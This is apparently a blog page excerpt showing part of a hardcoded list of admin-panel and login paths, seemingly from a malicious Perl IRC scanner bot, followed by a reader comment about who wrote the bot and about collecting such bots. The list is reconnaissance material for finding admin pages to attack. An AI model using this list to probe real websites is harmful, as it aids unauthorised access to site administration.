'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',505: 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',506: 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',507: 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',508: 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','log.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin1.php','admin1.html','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','ccms/','ccms/login.php','ccms/index.php','maintenance/','webmaster/','adm/','configuration/','configure/','websvn/','admin/','admin/account.php','admin/account.html'. 'admin/index.php','admin/index.html','admin/login.php'. 'admin/login.html','admin/log.php','admin/controlpanel.html','admin/controlpanel.php','admin.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/index.php','administrator/login.html','administrator/login.php','administrator/account.html','administrator/account.php','administrator.php','administrator.html','login.php','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.ht
yeah, I was able to encounter this IRC bot in IRC too. I think this was coded by nobody/ander from Indonesia based on the code. Btw, nice collection of Perl IRC bots.. I also have some collections here at home.
ReplyDelete-shipcode of theprojecxblog.net